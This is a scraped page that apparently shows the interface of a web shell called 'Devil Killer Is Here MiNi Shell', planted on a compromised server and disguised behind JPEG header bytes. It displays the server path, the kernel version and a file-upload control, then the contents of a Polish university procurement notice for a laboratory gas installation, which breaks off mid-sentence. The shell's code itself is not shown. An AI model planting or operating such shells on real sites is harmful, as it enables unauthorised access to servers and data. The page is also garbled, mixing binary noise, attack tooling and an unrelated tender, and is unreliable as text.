JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230308/0012677901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wykonanie ultraczystej, laboratoryjnej instalacji dystrybucji gazów specjalnych w laboratoriach nr 23 i 055 w budynku A Wydziału ETI PG. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Gdańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Elektroniki Telekomunikacji i Informatyki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Narutowicza 11/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 583486152</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">logistyka@eti.pg.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pg.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wykonanie ultraczystej, laboratoryjnej instalacji dystrybucji gazów specjalnych w laboratoriach nr 23 i 055 w budynku A Wydziału ETI PG. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77bd236f-bda9-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00126779</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pg_edu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pg_edu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim.<br/>2. Postępowanie, którego dotyczy niniejszy dokument, oznaczone jest znakiem: CRZP/52/009/R/23<br/> 3. Wykonawcy we wszystkich kontaktach z Zamawiającym powinni powoływać się na ten znak.<br/> 4. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy zakupowej <br/> https://platformazakupowa.pl/pn/pg_edu oraz poczty elektronicznej. <br/>5. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia lub znakiem postępowania. <br/>6. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość”, nie za pośrednictwem adresu email.<br/>7. W celu skrócenia czasu udzielenia odpowiedzi na pytania Zamawiający preferuje, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji Zamawiający uzna datę ich przesłania za <br/> pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość” po <br/> których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/><br/> 8. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej <br/> za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany <br/> specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie <br/> zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie <br/> z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie <br/> przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego <br/> wykonawcy.<br/><br/> 9. Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na <br/> platformazakupowa.pl, tj.:<br/> a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż <br/> 512 kb/s,<br/> b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB <br/> Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów <br/> operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/> c) zainstalowana dowolna przeglądarka internetowa, za wyjątkiem Internet <br/> Explorer, ze względu na zakończenie z dniem 17 sierpnia 2021 r. wspierania <br/> przeglądarki Internet Explorer przez firmę Microsoft.<br/> d) włączona obsługa JavaScript,<br/> e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format <br/> plików .pdf,<br/> f) Platforma działa według standardu przyjętego w komunikacji sieciowej – <br/> kodowanie UTF8,<br/> g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz <br/> dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera <br/> zsynchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/> 10. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia <br/> publicznego:<br/> a) musi zaakceptować warunki korzystania z platformazakupowa.pl określone w <br/> Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce <br/> „Regulamin&#34; oraz uznać go za wiążący,<br/> b) musi się zapoznać i stosować do Instrukcji składania ofert/wniosków dostępnej <br/> pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 oraz Dz. Urz. UE L 127 z 23.05.2018, str. 2), dalej „RODO”, Zamawiający informuje, że:<br/> a) administratorem Pani/Pana danych osobowych jest Politechnika Gdańska z <br/> siedzibą w 80-233 Gdańsk przy ul. G. Narutowicza 11/12<br/>b) inspektorem ochrony danych osobowych w Politechnice Gdańskiej jest mgr <br/> inż. Paweł Baniel, tel. +48 58 348-66-29, e-mail: iod@pg.edu.pl;<br/> c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c <br/> RODO w celu związanym z przedmiotowym postępowaniem o udzielenie <br/> zamówienia publicznego nr CRZP/52/009/R/23 pn. „Zaprojektowanie i wykonanie ultraczystej, laboratoryjnej instalacji dystrybucji gazów specjalnych w laboratoriach nr 23 i 055 w budynku A Wydziału ETI PG” prowadzonym w trybie <br/> podstawowym bez negocjacji;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania cały czas trwania umowy;<br/> f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/> g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych <br/> osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania udzielenie zamówienia publicznego ani zmianą <br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może <br/> naruszać integralności protokołu oraz jego załączników)<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych <br/> z siedzibą w Warszawie, przy ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, <br/> że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/> RODO;<br/> i) nie przysługuje Pani/Panu:<br/> −	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych <br/> osobowych;<br/> −	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> −	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/> osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych <br/> osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Stosownie do art. 19 ust. 4 ustawy Pzp, Zamawiający informuje o ograniczeniach, <br/> o których mowa w art. 19 ust. 2 i 3 oraz 75 ustawy Pzp:<br/> 1) Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia <br/> Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie <br/> ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie <br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne <br/> rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), <br/> zwanego dalej &#34;rozporządzeniem 2016/679&#34;, w celu umożliwienia korzystania ze środków <br/> ochrony prawnej, o których mowa w dziale IX, do upływu terminu na ich wniesienie <br/> 2) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub <br/> uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować <br/> zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w <br/> sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/> 3) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o <br/> którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych <br/> osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CRZP/52/009/R/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zaprojektowanie, wykonanie, dostawa i zainstalowanie <br/> ultraczystej, laboratoryjnej instalacji dystrybucji gazów specjalnych oraz sporządzenie <br/> projektu powykonawczego w laboratoriach budynku WETI „A” Politechniki Gdańskiej <br/> przy ul. Siedlickiej 5a w Gdańsku. Wszystkie pomieszczenia, instalacje i systemy <br/> związane z zainstalowaniem ultraczystej, laboratoryjnej instalacji dystrybucji gazów <br/> specjalnych muszą być dostosowane do aktualnie obowiązujących przepisów i norm <br/> branżowych ze szczególnym uwzględnieniem wymogów ochrony pożarowej, BHP. <br/><br/> 2. Zakres robót do realizacji obejmuje:<br/> - wykonanie i uzgodnienie dokumentacji projektowej oraz dokumentacji branżowych <br/> (architektoniczno-konstrukcyjna, elektryczna, sanitarna), <br/> - uzyskanie pozwoleń i decyzji wymaganych do wykonanie, dostawa i zainstalowania <br/> ultraczystej, laboratoryjnej instalacji dystrybucji gazów specjalnych - w tym <br/> wykonanie dokumentacji oraz uzyskanie pozwolenia na budowę (o ile będzie takie <br/> konieczne), <br/> - wykonanie niezbędnych prac adaptacyjnych i towarzyszących <br/> - wykonanie, dostawę i montaż ultraczystej, laboratoryjnej instalacji dystrybucji gazów<br/> specjalnych oraz sporządzenie projektu powykonawczego w laboratoriach budynku <br/> WETI „A” Politechniki Gdańskiej przy ul. Siedlickiej 5a w Gdańsku wg. <br/> przedstawionej i zaakceptowanej przez zamawiającego dokumentacji wraz z <br/> niezbędnymi pracami towarzyszącymi,<br/> - opracowanie oraz dostarczenie zamawiającemu kompletnej dokumentacji <br/> powykonawczej zamontowanych urządzeń oraz prac towarzyszących(dokumentacje <br/> branżowe, opracowania towarzyszące ekspertyzy) wraz z dokumentami określającymi <br/> projektową żywotność urządzeń<br/> - uzyskanie wymaganych aktualnymi przepisami praw dopuszczenia i zezwoleń <br/> na eksploatację zamontowanych urządzeń.<br/><br/> 3. Uwarunkowania własnościowe<br/><br/> Zamawiający oświadcza, że ma prawo do dysponowania nieruchomościami, na których <br/> przewidziano realizacje robót budowlanych w budynku A Wydziału Elektroniki, <br/> Telekomunikacji i Informatyki Politechniki Gdańskiej przy ul. Siedlickiej 5a, 80-222 <br/> Gdańsk, działka nr 357/12 obręb 55, Gdańsk, jednostka ewidencyjna: m. Gdańsk. <br/> Stosowne oświadczenia do celów uzyskania pozwolenia na budowę lub zgłoszenia robót <br/> budowlanych zostanie dostarczone, w trakcie realizacji przedmiotu zamówienia, o ile <br/> będą konieczne.<br/><br/> 4. Uwarunkowania lokalizacyjne<br/><br/> 4.1. Wszystkie roboty budowlane zostaną wykonane w budynku A Wydziału Elektroniki <br/> Telekomunikacji i Informatyki Politechniki Gdańskiej przy ul. Siedlickiej 5a, 80-222 <br/> Gdańsk, działka nr 357/12 obręb 55, Gdańsk, jednostka ewidencyjna: m. Gdańsk.<br/> 4.2. Realizacja zamówienia powinna przebiegać w sposób umożliwiający funkcjonowanie<br/> budynku A Wydziału Elektroniki Telekomunikacji i Informatyki Politechniki <br/> Gdańskiej.<br/><br/> 5. Etapowanie:<br/><br/> 5.1. ETAP I –Dokumentacja projektowa i prace przygotowawcze, w którego zakres <br/> wchodzą następujące prace:<br/> - wykonanie prac przygotowawczych niezbędnych do opracowania dokumentacji <br/> projektowych,<br/> - wykonanie dokumentacji projektowej oraz dokumentacji branżowych <br/> (architektoniczno-konstrukcyjna, elektryczna, sanitarna), <br/> - przekazanie Zamawiającemu do uzgodnienia i zatwierdzenia ( zamawiający <br/> przewiduje 7 dni robocze na sprawdzenie i wniesienie ewentualnych uwag do <br/> dokumentacji), zyskanie uzgodnienia dokumentacji w Centrach Politechniki <br/> Gdańskiej, <br/> - opracowanie szczegółowej dokumentacji kosztorysowej, po podpisaniu umowy<br/> - inne prace przygotowawcze.<br/><br/><br/><br/> 5.2. ETAP II – Roboty montażowe i inne<br/> - rozpoczęcie ETAPU II zostanie poprzedzone przekazaniem placu budowy <br/> wykonawcy.<br/> - wydzielenie terenu przewidzianego do prac budowlanych.<br/> - wykonanie prac budowlanych oraz innych niezbędnych prac towarzyszących<br/> w tym branżowych (instalacje elektryczne, instalacje teletechniczne, instalacja <br/> oświetleniowa).<br/> - montaż i realizacja ultraczystej, laboratoryjnej instalacji dystrybucji gazów <br/> specjalnych, uruchomienie próbne, regulacje.<br/> - uruchomienie systemu.<br/> - zalecenia Wykonawcy, szkolenia pracowników PG.<br/> - przekazanie dokumentacji powykonawczej. <br/> - przekazanie urządzeń do eksploatacji.<br/> - zakończenie ETAPU II uznaje się przekazanie Zamawiającemu dokumentacji <br/> powykonawczej oraz odbiór wykonanych robót - przekazanie urządzeń do <br/> eksploatacji.<br/><br/> 5.3. Etap III – Okres konserwacji oraz okres gwarancji i rękojmi<br/> - Rozpoczęcie etapu – po podpisaniu przez zamawiającego protokołu odbioru <br/> końcowego przedmiotu zamówienia.<br/> - usuwanie wad powstałych w okresie gwarancji i rękojmi.<br/> - konserwacja dostarczonych elementów instalacji przez okres trwania gwarancji <br/> i rękojmi zgodnie z instrukcją konserwacji oraz Umową.<br/><br/> 6. Uwarunkowania terminowe<br/><br/> 6.1. Zakończenie Etapu I w terminie 28 dni kalendarzowych od podpisania umowy.<br/> 6.2. Zakończenie Etapu II w terminie 100 dni od dnia przekazania Terenu <br/> Budowy<br/> 6.3. Zakończenie Etapu III wg. złożonej oferty.<br/>7. . Na szczegółowy opis przedmiotu zamówienia składa się:<br/> 1/ Program Funkcjonalno-Użytkowy<br/> 2/ STWiORB </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45333000-0 - Roboty instalacyjne gazowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">24110000-8 - Gazy przemysłowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta wykonawcy, która uzyska łącznie największą liczbę punktów zgodnie z poniższym wzorem:<br/><br/> P = Lcena+LOG<br/> gdzie:<br/> P - łączna liczba punktów ocenianej oferty<br/> Lcena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/> LOG - liczba uzyskanych punktów dla kryterium „Okres gwarancji” ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej <br/> jeżeli wykaże, że <br/><br/> 1) wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania <br/> ofert, a jeżeli okres prowadzenia 